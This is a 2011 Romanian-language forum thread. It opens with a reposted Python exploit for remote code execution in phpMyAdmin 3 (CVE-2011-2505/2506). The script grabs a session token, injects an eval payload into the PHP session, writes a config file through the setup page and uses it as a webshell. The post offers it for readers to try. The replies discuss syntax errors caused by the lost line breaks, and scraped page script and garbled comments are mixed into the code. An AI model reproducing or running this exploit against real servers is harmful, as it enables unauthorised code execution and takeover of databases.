Nytro Posted July 8, 2011 Report Share Posted July 8, 2011 phpMyAdmin3 (pma3) Remote Code Execution Exploit#!/usr/bin/env python# coding=utf-8# pma3 - phpMyAdmin3 remote code execute exploit# Author: wofeiwo<wofeiwo@80sec.com<script type="text/javascript">/* <![CDATA[ */(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();/* ]]> */</script>># Thx Superhei# Tested on: 3.1.1, 3.2.1, 3.4.3# CVE: CVE-2011-2505, CVE-2011-2506# Date: 2011-07-08# Have fun, DO *NOT* USE IT TO DO BAD THING.################################################# Requirements: 1. "config" directory must created&writeable in pma directory.# 2. session.auto_start = 1 in php.ini configuration.import os,sys,urllib2,redef usage(program): print "PMA3 (Version below 3.3.10.2 and 3.4.3.1) remote codeexecute exploit" print "Usage: %s <PMA_url>" % program print "Example: %s http://www.test.com/phpMyAdmin" % program sys.exit(0)def main(args): try: if len(args) < 2: usage(args[0]) if args[1][-1] == "/": args[1] = args[1][:-1] # ??????????token??sessionid??sessionid??phpMyAdmin???????µ? print "[+] Trying get form token&session_id.." content = urllib2.urlopen(args[1]+"/index.php").read() r1 = re.findall("token=(\w{32})", content) r2 = re.findall("phpMyAdmin=(\w{32,40})", content) if not r1: r1 = re.findall("token\" value=\"(\w{32})\"", content) if not r2: r2 = re.findall("phpMyAdmin\" value=\"(\w{32,40})\"", content) if len(r1) < 1 or len(r2) < 1: print "[-] Cannot find form token and session id...exit." sys.exit(-1) token = r1[0] sessionid = r2[0] print "[+] Token: %s , SessionID: %s" % (token, sessionid) # ??????????swekey.auth.lib.php????$_SESSION??? print "[+] Trying to insert payload in $_SESSION.." uri = "/libraries/auth/swekey/swekey.auth.lib.php?session_to_unset=HelloThere&_SESSION[ConfigFile0][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA&_SESSION[ConfigFile][Servers][*/eval(getenv('HTTP_CODE'));/*][host]=Hacked+By+PMA" url = args[1]+uri opener = urllib2.build_opener() opener.addheaders.append(('Cookie', 'phpMyAdmin=%s;pma_lang=en; pma_mcrypt_iv=ILXfl5RoJxQ%%3D; PHPSESSID=%s;' %(sessionid, sessionid))) urllib2.install_opener(opener) urllib2.urlopen(url) # ????setup???shell print "[+] Trying get webshell.." postdata ="phpMyAdmin=%s&tab_hash=&token=%s&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save"% (sessionid, token) url = args[1]+"/setup/config.php" # print "[+]Postdata: %s" % postdata urllib2.urlopen(url, postdata) print "[+] All done, pray for your lucky!" # ??????????????shell url = args[1]+"/config/config.inc.php" opener.addheaders.append(('Code', 'phpinfo();')) urllib2.install_opener(opener) print "[+] Trying connect shell: %s" % url result = re.findall("System \</td\>\<tdclass=\"v\"\>(.*)\</td\>\</tr\>", urllib2.urlopen(url).read()) if len(result) == 1: print "[+] Lucky u! System info: %s" % result[0] print "[+] Shellcode is: eval(getenv('HTTP_CODE'));" else: print "[-] Cannot get webshell." except Exception, e: print eif __name__ == "__main__" : main(sys.argv)Nu l-am incercat, pe cine intereseaza sa incerce.Sursa: phpMyAdmin3 (pma3) Remote Code Execution Exploit Quote Link to comment Share on other sites More sharing options...
xaren Posted July 8, 2011 Report Share Posted July 8, 2011 L-am incercat acum 20 minute dar da erori de sintaxa Quote Link to comment Share on other sites More sharing options...
Zatarra Posted July 9, 2011 Report Share Posted July 9, 2011 L-am incercat acum 20 minute dar da erori de sintaxa Iti da erori de sintaxa deoarece nu e aranjat bine. Rearanjeaza`l si apoi ruleaza`l. Python e foarte strict cand vine vorba de sintaxa. Imi place la nebunie treaba asta deoarece doar cei care cunosc codul stiu sa`l foloseasca. Daca bagi 5-10 tab`uri in cod se pierd toti skizzi.On: Nytro stiam de el, am sa`l probez zilele astea. Quote Link to comment Share on other sites More sharing options...
xaren Posted July 9, 2011 Report Share Posted July 9, 2011 Daca bagi 5-10 tab`uri in cod se pierd toti skizzi. Te referi la mine ? Quote Link to comment Share on other sites More sharing options...